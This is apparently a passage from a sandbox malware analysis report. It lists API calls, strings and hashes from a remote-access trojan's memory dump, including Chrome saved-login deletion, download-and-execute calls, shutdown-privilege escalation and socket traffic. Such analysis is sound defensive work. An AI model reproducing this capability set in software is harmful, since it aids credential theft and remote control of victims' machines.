                                                                                                                                                                                          • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                                                                          • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                                                                          • API String ID: 2127411465-314212984
                                                                                                                                                                                          • Opcode ID: 6c10451dec1dc8212356e78d1ef45bd742efc9717aca9a032300412d8e960269
                                                                                                                                                                                          • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c10451dec1dc8212356e78d1ef45bd742efc9717aca9a032300412d8e960269
                                                                                                                                                                                          • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _free.LIBCMT ref: 00449292
                                                                                                                                                                                          • _free.LIBCMT ref: 004492B6
                                                                                                                                                                                          • _free.LIBCMT ref: 0044943D
                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                                                                                                                          • _free.LIBCMT ref: 00449609
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 314583886-0
                                                                                                                                                                                          • Opcode ID: 97f29ae39021b22af0a9df0b5040c12a983afd5308f59d99880b8c0fff0a93ef
                                                                                                                                                                                          • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 97f29ae39021b22af0a9df0b5040c12a983afd5308f59d99880b8c0fff0a93ef
                                                                                                                                                                                          • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                                                                                                            • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                                                                                                            • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                                                                                                            • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                                                                                                            • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                                                                                                                                          • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                                                                          • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                                                                                                                          • API String ID: 1589313981-2876530381
                                                                                                                                                                                          • Opcode ID: f36725adc453bcf5032fda081e8724ac621dd34e58e17af2814313182f1d6942
                                                                                                                                                                                          • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                                                                                                                                                          • Opcode Fuzzy Hash: f36725adc453bcf5032fda081e8724ac621dd34e58e17af2814313182f1d6942
                                                                                                                                                                                          • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040BA93
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • UserProfile, xrefs: 0040BA59
                                                                                                                                                                                          • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                                                                                                                                          • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                                                                                                                                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteErrorFileLast
                                                                                                                                                                                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                                                                                          • API String ID: 2018770650-1062637481
                                                                                                                                                                                          • Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                                                                                                                                          • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                                                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004179D8
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                          • String ID: SeShutdownPrivilege
                                                                                                                                                                                          • API String ID: 3534403312-3733053543
                                                                                                                                                                                          • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                                                                                                          • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                                                                                                                                                          • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                                                                                                          • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00409293
                                                                                                                                                                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,012D56C0,00000010), ref: 004048E0
                                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                                                                                                                                            • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                                                                                                            • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                                                                                                            • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                                                                                                                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                                                                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1824512719-0
                                                                                                                                                                                          • Opcode ID: d4d982e18130e156b6af09fb50c326592b9e726f4395f111a07ec22de4779e78
                                                                                                                                                                                          • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                                                                                                                                                          • Opcode Fuzzy Hash: d4d982e18130e156b6af09fb50c326592b9e726f4395f111a07ec22de4779e78
                                                                                                                                                                                          • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                                                                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                                                                                                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 276877138-0
                                                                                                                                                                                          • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                                                                                                                          • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                                                                                                                                                          • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                                                                                                                          • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                                                                                                                                                          • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                                          • API String ID: 2299586839-711371036
                                                                                                                                                                                          • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                                                                                                          • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                                                                                                                                                          • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 004096A5
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                                                                                                                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1157919129-0
                                                                                                                                                                                          • Opcode ID: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                                                                                                                                          • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 0040884C
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1771804793-0
                                                                                                                                                                                          • Opcode ID: 99a3056b48020488f4a7cc8d14455ae8aa2eebd7be9758c69deaf4fbc99c6cac
                                                                                                                                                                                          • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                                                                                                                                                          • Opcode Fuzzy Hash: 99a3056b48020488f4a7cc8d14455ae8aa2eebd7be9758c69deaf4fbc99c6cac
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                                                                                                                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DownloadExecuteFileShell
                                                                                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                                                                                                                                                          • API String ID: 2825088817-3056885514
                                                                                                                                                                                          • Opcode ID: 37cd12fcc7ef71c22cc9d869740aa10db7399bf8fc5aa589d703b0ccccefadff
                                                                                                                                                                                          • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 37cd12fcc7ef71c22cc9d869740aa10db7399bf8fc5aa589d703b0ccccefadff
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFind$FirstNextsend
                                                                                                                                                                                          • String ID: XPG$XPG
                                                                                                                                                                                          • API String ID: 4113138495-1962359302
                                                                                                                                                                                          • Opcode ID: fd6193630a935a9c0783525d90d8abb728b5b23f535aeb2500ec47bbe22b8f4c
                                                                                                                                                                                          • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                                                                                                                                                          • Opcode Fuzzy Hash: fd6193630a935a9c0783525d90d8abb728b5b23f535aeb2500ec47bbe22b8f4c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                                                                                                            • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                                                                                                                            • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137E1
                                                                                                                                                                                            • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137EC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                                                          • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                                                          • API String ID: 4127273184-3576401099
                                                                                                                                                                                          • Opcode ID: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                                                                                                                                          • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                                                                                                                                                          • Opcode Fuzzy Hash: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                                                                                                                                          • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4212172061-0
                                                                                                                                                                                          • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                                                                                                                                          • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                                                                                                                                                          • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
